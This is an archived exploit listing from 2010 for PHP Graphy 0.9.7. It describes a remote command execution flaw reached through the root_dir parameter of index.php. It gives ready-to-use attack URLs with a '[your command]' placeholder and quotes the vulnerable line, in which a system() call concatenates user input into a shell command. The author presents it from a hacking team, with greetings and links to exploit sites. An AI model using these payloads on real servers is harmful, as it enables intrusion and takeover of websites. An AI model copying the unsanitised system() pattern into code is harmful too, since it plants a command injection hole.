PHP Graphy <= 0.9.7 (index.php) Remote Command Execution Vulnerability

2010-05-24T00:00:00
ID 1337DAY-ID-12378
Type zdt
Reporter Sn!pEr.S!Te
Modified 2010-05-24T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================================================
PHP Graphy <= 0.9.7 (index.php) Remote Command Execution Vulnerability
======================================================================


--------------------------------------------------------------
#[+] Author : Sn!pEr.S!Te Hacker #
# [+] Email : [email protected] #
# [+] T34M Sn!pEr.S!Te Hacker #
# [+] 24-5-2010 #
# [+] Script : lmage »PHP Graphy#
# [+] Download:http://sourceforge.net/projects/phpgraphy/files/phpgraphy/0.9.7/phpgraphy-0.9.7.tar.gz/download #
# Version: [0.9.7] #
 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
 
Exploit : phpgraphy-0.9.7\index.php
 
http://localhost/phpgraphy-0.9.7/index.php?root_dir=[your command]
 
http://127.0.0.1/phpgraphy-0.9.7/index.php?root_dir=[your command]
 
 
system("cat \"".$root_dir.$display."_comment\"");
 
line : 791
 
web site Favorites my : http://inj3ct0r.com/ & http://www.hack0wn.com/ & http://www.exploit-db.com
 
================== Greetz : all my friend ===================
* PrX Hacker * Sm Hacker * AbUbAdR * mAsH3L ALLiL * saleh Hacker * ALhal alsab |
* HitLer.3rb * QAHER ALRAFDE * DjHacker * Mr.JLD* Mr.koka |



#  0day.today [2018-01-10]  #